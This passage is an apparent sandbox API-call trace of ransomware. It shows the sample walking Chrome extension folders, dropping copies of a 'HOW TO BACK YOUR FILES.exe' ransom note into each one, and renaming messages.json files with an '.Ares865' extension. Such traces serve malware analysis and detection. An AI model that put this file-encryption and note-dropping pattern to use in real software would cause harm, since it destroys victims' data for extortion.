"c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.068] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=276) returned 1 [0102.071] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az" [0102.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az" [0102.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.072] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.072] GetLastError () returned 0x0 [0102.073] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.073] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.073] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.073] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.073] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.073] lstrlenW (lpString="messages.json") returned 13 [0102.073] lstrlenW (lpString="Ares865") returned 7 [0102.073] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.073] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.Ares865") returned 160 [0102.073] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.075] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=167) returned 1 [0102.078] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar" [0102.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar" [0102.079] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.079] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.079] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.080] GetLastError () returned 0x0 [0102.080] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8dfac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8dfac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.080] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.080] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.080] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.080] lstrlenW (lpString="messages.json") returned 13 [0102.080] lstrlenW (lpString="Ares865") returned 7 [0102.080] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.080] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.Ares865") returned 160 [0102.080] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.082] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0102.086] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am" [0102.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am" [0102.087] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.087] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.087] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.088] GetLastError () returned 0x0 [0102.088] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8dfac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8dfac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.088] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.088] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.088] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.088] lstrlenW (lpString="messages.json") returned 13 [0102.088] lstrlenW (lpString="Ares865") returned 7 [0102.088] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.Ares865") returned 160 [0102.088] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=259) returned 1 [0102.093] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af" [0102.093] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af" [0102.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.094] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.094] GetLastError () returned 0x0 [0102.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dd4d90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8dfac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8dfac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.094] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.094] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.095] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.095] lstrlenW (lpString="messages.json") returned 13 [0102.095] lstrlenW (lpString="Ares865") returned 7 [0102.095] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.Ares865") returned 160 [0102.095] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=132) returned 1 [0102.100] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap" [0102.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap" [0102.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.101] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.101] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.101] GetLastError () returned 0x0 [0102.102] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e905c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e905c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.102] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.102] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.102] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="1.1_0" | out: lpString1="1.1_0") returned="1.1_0" [0102.102] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0" [0102.102] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0") returned="C:\\Users\\5p5NrGJn0jS 